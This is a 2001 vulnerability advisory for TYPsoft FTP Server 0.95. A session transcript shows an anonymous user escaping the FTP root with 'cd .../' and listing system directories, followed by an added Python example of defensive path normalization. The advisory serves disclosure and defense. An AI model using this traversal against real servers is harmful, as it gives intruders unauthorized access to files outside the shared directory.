~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability in TYPsoft FTP server v0.95
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:
TYPsoft FTP Server is a freeware FTP server available from http://typsoft.n3.net .

Affected systems:
FTP server v0.95 - 0.93 and probably prior versions for Windows 95/98/NT/2000/ME

Description:
An attacker with anonymous access to the FTP server can break out of the FTP root using the dot vulnerability. This is the problem:

>ftp 127.0.0.1
220 TYPsoft FTP server 0.95 ready...
User (127.0.0.1:(none)): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp>pwd
257 " / " is current directory.
ftp>cd ../
501 CWD failed. Cannot accept relative path using dot notation.
ftp> cd .../
250 CWD command successful. "/.../" is current directory.
ftp>dir
drw-rw-rw- 1 ftp ftp 0 May 01 19:44 FTP Server
drw-rw-rw- 1 ftp ftp 0 May 01 19:47 temp
drw-rw-rw- 1 ftp ftp 0 Dec 24 2000 windows
.....
226 Transfer complete.
ftp>

Vendor status:
TYPsoft staff was contacted on Tuesday 1 May, 2001 and no reply was received.

SosPiro
sospiroat_private
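
The transcript shows a filter that refuses "../" but accepts ".../". A server-side path check that does not depend on matching one literal string, as an added example that is not part of the original advisory and not TYPsoft's code; the names resolve_virtual_path, PathRejected and is_allowed are hypothetical, and it assumes the server keeps a virtual working directory with "/" as the FTP root:

```python
import posixpath


class PathRejected(ValueError):
    """Raised when a client-supplied FTP path argument is refused."""


def resolve_virtual_path(cwd: str, arg: str) -> str:
    """Normalize a CWD argument against the session's virtual directory.

    cwd is always absolute, with "/" meaning the FTP root. The result is a
    clean virtual path that the caller may append to the real root directory.
    """
    # Windows file APIs accept both separators, so check both the same way.
    arg = arg.replace("\\", "/")
    if "\x00" in arg or ":" in arg:
        raise PathRejected("NUL byte or drive/stream separator in path")
    combined = arg if arg.startswith("/") else posixpath.join(cwd, arg)
    resolved = []
    for seg in combined.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not resolved:
                raise PathRejected("path climbs above the FTP root")
            resolved.pop()
            continue
        # "..." is the segment that got past the "../" filter in the transcript.
        # Win32 path normalization also drops trailing dots and spaces, so any
        # segment that changes when they are stripped is refused outright.
        if seg.rstrip(". ") != seg:
            raise PathRejected("segment ends in dots or spaces: %r" % seg)
        resolved.append(seg)
    return "/" + "/".join(resolved)


def is_allowed(cwd: str, arg: str) -> bool:
    """True if the argument resolves to a path inside the FTP root."""
    try:
        resolve_virtual_path(cwd, arg)
        return True
    except PathRejected:
        return False
```

The resolved virtual path, never the raw client string, is what should be joined to the real root before any file system call.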